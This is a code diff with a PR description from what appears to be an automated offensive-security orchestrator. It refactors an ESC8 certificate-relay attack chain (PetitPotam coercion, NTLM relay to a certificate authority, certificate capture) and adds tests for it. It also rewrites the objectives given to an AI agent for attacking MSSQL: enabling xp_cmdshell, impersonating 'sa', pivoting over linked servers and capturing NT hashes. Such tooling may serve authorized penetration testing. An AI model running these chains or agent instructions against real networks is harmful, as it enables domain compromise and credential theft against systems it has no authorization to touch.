+        "template": template,
+        "coerce_user": cred_username,
+        "coerce_password": cred_password,
+        "coerce_domain": cred_domain,
+    })
+}
+
 /// ADCS vulnerability types we know how to exploit.
 /// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool)
 /// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain)
@@ -836,12 +922,7 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         );
         return false;
     }
-    let coerce_candidates: Vec<String> = item
-        .coerce_candidates
-        .iter()
-        .take(ESC8_MAX_COERCE_ATTEMPTS)
-        .cloned()
-        .collect();
+    let coerce_candidates: Vec<String> = cap_esc8_candidates(&item.coerce_candidates);
     let Some(cred) = item.credential.clone() else {
         debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — no credential");
         return false;
@@ -889,15 +970,15 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         let mut bind_busy = false;
         let mut last_task_id = String::new();
         for (idx, coerce_target) in coerce_candidates.iter().enumerate() {
-            let relay_args = serde_json::json!({
-                "ca_host": ca_host_bg,
-                "coerce_target": coerce_target,
-                "attacker_ip": attacker_ip,
-                "template": template,
-                "coerce_user": cred.username,
-                "coerce_password": cred.password,
-                "coerce_domain": cred.domain,
-            });
+            let relay_args = build_relay_coerce_args(
+                &ca_host_bg,
+                coerce_target,
+                &attacker_ip,
+                &template,
+                &cred.username,
+                &cred.password,
+                &cred.domain,
+            );
             let relay_task_id = format!(
                 "esc8_chain_{}",
                 &uuid::Uuid::new_v4().simple().to_string()[..12]
@@ -936,11 +1017,13 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 }
             };
 
+            let parsed = parse_relay_coerce_output(&relay_output.output);
+
             // Early-out on RELAY_BIND_BUSY — another relay holds port 445
             // host-wide. Subsequent candidates would race the same way.
             // Clear dedup so the next ESC8 tick can retry once the holder
             // releases.
-            if relay_output.output.contains("RELAY_BIND_BUSY") {
+            if parsed.bind_busy {
                 warn!(
                     vuln_id = %vuln_id_bg,
                     coerce_target = %coerce_target,
@@ -951,24 +1034,9 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 break;
             }
 
-            let candidate_pfx = relay_output
-                .output
-                .lines()
-                .find_map(|line| line.trim().strip_prefix("PFX_FILE="))
-                .map(str::trim)
-                .filter(|p| !p.is_empty())
-                .map(str::to_string);
-            let candidate_user = relay_output
-                .output
-                .lines()
-                .find_map(|line| line.trim().strip_prefix("RELAYED_USER="))
-                .map(str::trim)
-                .filter(|u| !u.is_empty())
-                .map(str::to_string);
-
-            if let Some(p) = candidate_pfx {
+            if let Some(p) = parsed.pfx_path {
                 pfx_path = Some(p);
-                relayed_user = candidate_user;
+                relayed_user = parsed.relayed_user;
                 info!(
                     vuln_id = %vuln_id_bg,
                     coerce_target = %coerce_target,
@@ -2081,5 +2149,130 @@ mod tests {
         let dcs: HashMap<String, String> = HashMap::new();
         let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]);
         assert!(out.is_empty());
+    }
+
+    // --- parse_relay_coerce_output --------------------------------------
+
+    #[test]
+    fn parse_relay_output_captures_pfx_and_user() {
+        let stdout = "\
+RELAY_PID=12345
+=== Phase 1: unauth PetitPotam ===
+[*] PetitPotam succeeded
+=== RELAY LOG ===
+[+] Authenticating against http://192.168.58.50/certsrv
+[+] Saving ticket in attacker.ccache
+PFX_FILE=/tmp/ares_relay_abc/DC01$.pfx
+RELAYED_USER=DC01$
+";
+        let parsed = super::parse_relay_coerce_output(stdout);
+        assert!(!parsed.bind_busy);
+        assert_eq!(
+            parsed.pfx_path.as_deref(),
+            Some("/tmp/ares_relay_abc/DC01$.pfx")
+        );
+        assert_eq!(parsed.relayed_user.as_deref(), Some("DC01$"));
+    }
+
+    #[test]
+    fn parse_relay_output_detects_bind_busy() {
+        let stdout = "RELAY_BIND_BUSY\nAnother relay_and_coerce is active on this host (loopback port 41445 held).";
+        let parsed = super::parse_relay_coerce_output(stdout);
+        assert!(parsed.bind_busy);
+        // PFX/RELAYED_USER ignored on bind-busy paths.
+        assert_eq!(parsed.pfx_path, None);
+        assert_eq!(parsed.relayed_user, None);
+    }
+
+    #[test]
+    fn parse_relay_output_no_markers_when_chain_failed() {
+        // PetitPotam triggered but the relay listener died before capture;
+        // no PFX_FILE / RELAYED_USER markers in stdout.
+        let stdout = "RELAY_PID=12345\n[!] PetitPotam returned 0x6 ERROR_INVALID_HANDLE\n=== RELAY LOG ===\n";
+        let parsed = super::parse_relay_coerce_output(stdout);
+        assert!(!parsed.bind_busy);
+        assert_eq!(parsed.pfx_path, None);
+        assert_eq!(parsed.relayed_user, None);
+    }
+
+    #[test]
+    fn parse_relay_output_ignores_empty_marker_values() {
+        // Defensive: a malformed `PFX_FILE=` with no value should not be
+        // treated as a successful capture (would dispatch certipy_auth on
+        // an empty path).
+        let stdout = "PFX_FILE=\nRELAYED_USER=   \n";
+        let parsed = super::parse_relay_coerce_output(stdout);
+        assert_eq!(parsed.pfx_path, None);
+        assert_eq!(parsed.relayed_user, None);
+    }
+
+    #[test]
+    fn parse_relay_output_handles_empty_input() {
+        let parsed = super::parse_relay_coerce_output("");
+        assert!(!parsed.bind_busy);
+        assert_eq!(parsed.pfx_path, None);
+        assert_eq!(parsed.relayed_user, None);
+    }
+
+    // --- cap_esc8_candidates --------------------------------------------
+
+    #[test]
+    fn cap_esc8_candidates_truncates_to_max() {
+        let many: Vec<String> = (0..10).map(|i| format!("192.168.58.{i}")).collect();
+        let capped = super::cap_esc8_candidates(&many);
+        assert_eq!(capped.len(), super::ESC8_MAX_COERCE_ATTEMPTS);
+        // Order preserved — pick_coerce_targets puts DCs first.
+        assert_eq!(capped[0], "192.168.58.0");
+    }
+
+    #[test]
+    fn cap_esc8_candidates_passes_through_shorter_lists() {
+        let two = vec!["192.168.58.1".to_string(), "192.168.58.2".to_string()];
+        let capped = super::cap_esc8_candidates(&two);
+        assert_eq!(capped, two);
+    }
+
+    #[test]
+    fn cap_esc8_candidates_empty_stays_empty() {
+        let empty: Vec<String> = Vec::new();
+        assert!(super::cap_esc8_candidates(&empty).is_empty());
+    }
+
+    // --- build_relay_coerce_args ----------------------------------------
+
+    #[test]
+    fn build_relay_coerce_args_includes_all_required_fields() {
+        let args = super::build_relay_coerce_args(
+            "192.168.58.50",
+            "192.168.58.10",
+            "192.168.58.178",
+            "DomainController",
+            "alice",
+            "P@ssw0rd!",
+            "contoso.local",
+        );
+        assert_eq!(args["ca_host"], "192.168.58.50");
+        assert_eq!(args["coerce_target"], "192.168.58.10");
+        assert_eq!(args["attacker_ip"], "192.168.58.178");
+        assert_eq!(args["template"], "DomainController");
+        assert_eq!(args["coerce_user"], "alice");
+        assert_eq!(args["coerce_password"], "P@ssw0rd!");
+        assert_eq!(args["coerce_domain"], "contoso.local");
+    }
+
+    #[test]
+    fn build_relay_coerce_args_template_override() {
+        // The orchestrator passes the matching template from the discovered
+        // ADCS vuln — verify it's forwarded verbatim.
+        let args = super::build_relay_coerce_args(
+            "192.168.58.50",
+            "192.168.58.10",
+            "192.168.58.178",
+            "WebServerAuth",
+            "alice",
+            "P@ssw0rd!",
+            "contoso.local",
+        );
+        assert_eq!(args["template"], "WebServerAuth");
     }
 }

--- a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
@@ -186,20 +186,27 @@ pub async fn auto_mssql_exploitation(
                     "domain": cred.domain,
                 },
                 "objectives": [
-                    "Enable xp_cmdshell and execute `whoami` to confirm code execution",
-                    "Immediately after `whoami` returns, run `whoami /priv` via xp_cmdshell and include the FULL privilege table in your tool_outputs verbatim — the orchestrator parses the table to detect SeImpersonatePrivilege Enabled and credit the SeImpersonate primitive on the scoreboard. Skipping this step leaves the seimpersonate token unclaimed even when the MSSQL service account holds the privilege.",
-                    "Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin",
-                    "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'",
-                    "For each impersonatable login, try EXECUTE AS LOGIN = '<login>' and check IS_SRVROLEMEMBER('sysadmin')",
-                    "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'",
-                    "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation",
-                    "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1",
-                    "Extract credentials via xp_cmdshell (e.g., reg query for autologon, in-memory secrets)",
-                    "If SeImpersonatePrivilege is Enabled, the seimpersonate primitive is already scoreboard-credited by the orchestrator's parser; chasing PrintSpoofer/GodPotato escalation is optional and lower priority than enumerating impersonation paths in MSSQL itself",
-                    "Enumerate linked servers and test RPC execution on each link",
-                    "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1",
-                    "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)",
-                    "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`",
+                    // STOP CONDITION (must be first — agents have been observed
+                    // burning through MaxSteps because they tried every objective
+                    // before calling task_complete):
+                    //
+                    // Call `task_complete` AS SOON AS ANY of these landed —
+                    // partial wins beat exhaustive enumeration. The orchestrator
+                    // dispatches follow-on automations from the discoveries you
+                    // already published; you do NOT need to chase every remaining
+                    // primitive in this single task.
+                    "STOP CONDITION: call `task_complete` as soon as ANY of these landed: (a) sysadmin via EXECUTE AS LOGIN = 'sa' or another impersonatable login, (b) NT hash captured via xp_cmdshell + secretsdump/reg, (c) linked-server hop confirmed by remote SELECT rows, (d) any credential / hash published by parser. Stop enumerating after one win — the orchestrator chains follow-ups automatically. Burning all 75 steps chasing every objective is a regression in this task.",
+
+                    // Quick-win path (priority order — the agent should walk
+                    // these in order and call task_complete at the first hit):
+                    "1. Enable xp_cmdshell, run `whoami` to confirm code execution. If that returns SYSTEM or a privileged service account, call task_complete with the evidence.",
+                    "2. Run `whoami /priv` via xp_cmdshell and include the FULL privilege table verbatim in tool_outputs. The orchestrator parses SeImpersonatePrivilege Enabled and credits the seimpersonate primitive automatically. No further potato/PrintSpoofer escalation needed in this task.",
+                    "3. If current login is not sysadmin, try EXECUTE AS LOGIN = 'sa'. If it succeeds, call task_complete — that's a sysadmin pivot and the orchestrator will chain xp_cmdshell + secretsdump from there.",
+                    "4. Enumerate impersonatable logins ONCE: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'. For each (max 3 attempts), try EXECUTE AS LOGIN = '<login>' + IS_SRVROLEMEMBER('sysadmin'). First sysadmin hit → call task_complete.",
+                    "5. Enumerate linked servers ONCE: SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id. Try `mssql_exec_linked` (or `mssql_openquery` when uses_self_credential=0) against the first link with rpc_out_enabled=1. First confirmed remote SELECT → call task_complete.",
+
+                    // Secondary (only if all primary steps surfaced no win):
+                    "If steps 1–5 all surfaced no win, call task_complete with status describing exactly what failed (e.g. `not sysadmin, no impersonatable logins, links exist but all rpc_out_enabled=0`). DO NOT try TRUSTWORTHY DB owner chains, in-memory secret dumps, or extended enumeration — those are lower-priority and the orchestrator will dispatch them as separate tasks if needed.",
                 ],
             });
             if !item.linked_server.is_empty() {


### PR DESCRIPTION
**Key Changes:**

- Enhanced ESC8 exploitation logic to attempt multiple coerce candidates per dispatch
- Introduced a configurable limit (`ESC8_MAX_COERCE_ATTEMPTS`) for coerce attempts per tick
- Improved error handling and logging for candidate attempts and relay binding conflicts
- Increased robustness of the dispatch loop for patched or unreachable targets

**Added:**

- Maximum coerce candidate attempts per dispatch - Added the `ESC8_MAX_COERCE_ATTEMPTS` constant and logic to iterate over multiple candidates in each ESC8 exploitation tick

**Changed:**

- ESC8 exploitation flow - Updated the `dispatch_esc8_deterministic` function to walk up to three coerce candidates per tick instead of only the first, increasing the chances of successful exploitation in mixed-patch environments
- Error handling and logging - Improved reporting for each candidate attempt, including early exit on port 445 relay binding conflicts and summaries for failed attempts
- Deduplication logic - Enhanced to clear deduplication state only on certain error paths, allowing more intelligent retry behavior

**Removed:**

- Single-candidate exploitation logic - Eliminated the previous approach of trying only the first available coerce candidate per dispatch, ensuring broader coverage in each execution